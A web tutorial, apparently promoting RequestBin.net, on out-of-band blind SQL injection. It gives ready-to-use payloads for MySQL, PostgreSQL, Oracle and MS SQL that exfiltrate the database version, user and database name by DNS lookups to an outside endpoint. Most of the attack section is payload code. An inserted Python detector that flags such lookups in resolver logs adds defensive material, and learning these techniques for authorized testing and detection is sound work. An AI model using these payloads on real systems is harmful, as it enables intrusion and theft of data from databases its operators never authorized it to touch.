Exploiting Blind SQL Injection Using DNS Bin on RequestBin

Discover how to exploit Blind SQL Injection with DNSBin on RequestBin.net. Learn OOB SQLi techniques for MySQL, PostgreSQL, Oracle, and MS SQL using payloads that exfiltrate data via DNS queries. Perfect for ethical hacking and advanced security testing.

What is Out-of-Band SQL Injection?

Out-of-Band SQL Injection is a method where attackers exfiltrate data without direct responses from the application. Instead, they use external endpoints (e.g., DNS or HTTP servers) to receive the extracted information.

How It Works:

  1. Data Encoding: Sensitive data is encoded into a DNS or HTTP request.
  2. Request Trigger: The vulnerable application executes an SQL query, triggering the request.
  3. Data Retrieval: The attacker’s server captures the data and decodes it for analysis.

Using DNS Bin on RequestBin.net for SQLi Testing

Step 1: Generate a DNS Bin Endpoint

Visit app.requestbin.net and create a unique endpoint.

Example endpoint from RequestBin: sampledns.oast.pro

Step 2: Inject Payloads into SQL Queries

Place the DNS Bin endpoint domains (e.g., sampledns.oast.pro) in SQL payloads. This directs exfiltrated data to your endpoint.

Step 3: Monitor DNS Requests

Use the RequestBin dashboard to view real-time logs of incoming DNS requests, which reveal exfiltrated data.

The password hash from the database appears in the RequestBin log.

Exploiting SQL Databases with OOB SQL Injection

1. MySQL Example

Payload:

SELECT load_file(CONCAT('\\\\',(SELECT @@version),'.',(SELECT user()),'.', (SELECT DATABASE()),'.dnsendpoint.requestbin.net\\test.txt'));

How It Works:

  • The load_file() function reads files or generates DNS queries.
  • Data such as the database version, user, and name is encoded into the query and sent to dnsendpoint.requestbin.net.
  • Captures data in the format:
mysql_version.user.database_name.dnsendpoint.requestbin.net

2. PostgreSQL Example

Payload:

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result_version TEXT;
DECLARE query_result_user TEXT;
BEGIN
  SELECT INTO query_result_version current_setting('server_version');
  SELECT INTO query_result_user current_user;
  exec_cmd := 'COPY table_output(content) FROM E\'\\\\\\\\'||query_result_version||'.'||query_result_user||'.dnsendpoint.requestbin.net\\test.txt\'';
  EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

How It Works:

  • The COPY function allows SQL data to be written to an external file.
  • Here, it’s used to send database version and user information to dnsendpoint.requestbin.net.
  • Logs show format:
postgres_version.user.dnsendpoint.requestbin.net

3. Oracle Example

Payload:

SELECT DBMS_LDAP.INIT(
  (SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(SELECT name FROM v$database)||'.dnsendpoint.requestbin.net',80
) FROM dual;

How It Works:

  • The DBMS_LDAP.INIT() function triggers DNS requests.
  • Encoded data (e.g., version, user, database name) is sent to the DNSBin endpoint.
  • The log output shows the exfiltrated data in the format:
version_oracle.user_dual.user_db.dnsendpoint.requestbin.net

4. MS SQL Example

Payload:

DECLARE @a VARCHAR(1024);
DECLARE @b VARCHAR(1024);
SELECT @a = (SELECT SYSTEM_USER);
SELECT @b = (SELECT DB_NAME());
EXEC('master..xp_dirtree "\\\\'||@a||'.'||@b||'.dnsendpoint.requestbin.net\\test$"');

How It Works:

  • The xp_dirtree stored procedure generates a DNS query.
  • Exfiltrates the system user and database name to the DNSBin endpoint.
  • DNSBin showing the captured query:
mssql_user.database_name.dnsendpoint.requestbin.net
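
All four payloads above end the same way on the wire: the database server resolves a name under a domain it has no reason to contact, with the data carried in the leading labels. The following Python detector is an added example, not part of the original article, that flags such lookups in resolver logs. The log format, the DB_HOSTS addresses, the corp.example allowlist and the sample lines are constructed assumptions.

```python
from collections import defaultdict

# Constructed resolver log, one query per line: "<time> <client_ip> <qtype> <qname>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.5.20 A ntp.corp.example.
2024-05-01T10:00:07Z 10.0.5.20 A 8.0.36.app_user.shop.dnsendpoint.requestbin.net.
2024-05-01T10:00:09Z 10.0.9.14 A www.example.org.
2024-05-01T10:00:12Z 10.0.5.21 A SA.master.dnsendpoint.requestbin.net.
2024-05-01T10:00:13Z 10.0.5.21 A SA.master.dnsendpoint.requestbin.net.
malformed line
"""

DB_HOSTS = {"10.0.5.20", "10.0.5.21"}   # assumption: addresses of database servers
ALLOWED_ZONES = ("corp.example",)       # assumption: zones those servers may resolve


def in_allowed_zone(qname):
    """True if qname is an allowed zone or a name beneath one."""
    return any(qname == z or qname.endswith("." + z) for z in ALLOWED_ZONES)


def find_oob_lookups(log_text, zone_labels=2):
    """Group unexpected lookups made by database hosts by receiving zone.

    zone_labels is a naive stand-in for a Public Suffix List lookup: the last
    N labels are treated as the receiving zone, the rest as carried data.
    Returns {zone: [(client_ip, data_labels), ...]} with duplicates removed.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue                       # skip lines that do not parse
        _time, client, _qtype, qname = fields
        qname = qname.rstrip(".").lower()  # DNS names are case-insensitive
        if client not in DB_HOSTS or in_allowed_zone(qname):
            continue
        labels = qname.split(".")
        zone = ".".join(labels[-zone_labels:])
        data = ".".join(labels[:-zone_labels])
        hits[zone].add((client, data))
    return {zone: sorted(pairs) for zone, pairs in hits.items()}


if __name__ == "__main__":
    for zone, pairs in find_oob_lookups(SAMPLE_LOG).items():
        for client, data in pairs:
            print(f"ALERT {client} resolved a name under {zone}; data labels: {data}")
```

A version string such as 8.0.36 contains dots, so it spreads over several labels; the detector therefore reports everything left of the receiving zone as one string instead of assuming one value per label.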

Conclusion

Testing for Out-of-Band SQL Injection is essential for identifying vulnerabilities in modern web applications. By leveraging tools like DNS Bin on RequestBin.net, security professionals can simulate real-world attack scenarios and build effective defenses.

Get started with DNS Bin on RequestBin.net and elevate your security testing.